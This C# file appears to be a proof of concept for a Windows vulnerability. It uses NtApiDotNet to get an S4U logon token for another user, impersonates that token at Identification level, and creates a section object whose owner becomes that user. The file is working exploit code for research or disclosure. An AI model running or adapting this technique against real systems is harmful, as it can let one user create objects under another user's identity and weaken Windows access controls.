﻿using NtApiDotNet;
using NtApiDotNet.Win32;
using System;

namespace PoC_ArbitraryObjectOwner
{
    class Program
    {
        static NtToken GetS4UToken(string username)
        {
            return TokenUtils.GetLogonS4UToken(username, Environment.UserDomainName, SecurityLogonType.Network);
        }

        static void TestSection(NtToken token)
        {
            Console.WriteLine("Token Impersonation Level: {0}", token.ImpersonationLevel);
            Console.WriteLine("Token Owner: {0}", token.Owner.Name);
            var sd = new SecurityDescriptor("D:(A;;GA;;;WD)");
            using (var obja = new ObjectAttributes(null, AttributeFlags.CaseInsensitive, (NtObject)null, null, sd))
            {
                using (var section = token.RunUnderImpersonate(() => NtSection.Create(obja,
                    SectionAccessRights.GenericAll, new LargeInteger(1024 * 1024), MemoryAllocationProtect.ReadWrite, SectionAttributes.Commit, null),
                    SecurityImpersonationLevel.Identification))
                {
                    Console.WriteLine("Section Owner: {0}", section.SecurityDescriptor.Owner.Sid.Name);
                    Console.WriteLine("Section IL: {0}", section.SecurityDescriptor.IntegrityLevel);
                }
            }
        }

        static void Main(string[] args)
        {
            try
            {
                if (args.Length < 1)
                {
                    throw new Exception("Specify the user name of another user of the system.");
                }

                using (var token = NtToken.OpenProcessToken())
                {
                    TestSection(token);
                }

                using (var token = GetS4UToken(args[0]))
                {
                    TestSection(token);
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex.Message);
            }

        }
    }
}
